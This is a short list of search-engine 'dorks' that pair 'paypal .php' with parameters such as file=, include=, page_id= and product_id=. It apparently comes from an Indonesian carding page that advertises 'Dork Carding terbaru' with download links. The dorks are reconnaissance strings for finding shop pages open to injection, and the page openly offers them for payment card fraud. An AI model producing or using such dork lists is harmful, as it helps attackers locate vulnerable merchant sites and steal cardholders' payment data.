paypal .php?file=
paypal .php?cat=
paypal .php?include=
paypal .php?pageid=
paypal .php?page_id=
paypal .php?param=
paypal .php?panel=
paypal .php?sec=
paypal .php?do=part&id=
paypal .php?item_id=
paypal .php?client=
paypal .php?co_id=
paypal .php?language=
paypal .php?currency=
paypal .php?checkout=
paypal .php?cid=
paypal .php?products_name=
paypal .php?product_id=
paypal .php?step=
paypal .php?topicid=
paypal .php?topic_id=
paypal .php?id_category=
paypal .php?tid=
paypal .php?fid=





Update Dork Carding terbaru!!!

Update Dork Carding terbaru!!!


Download Dork 1




Download Dork 2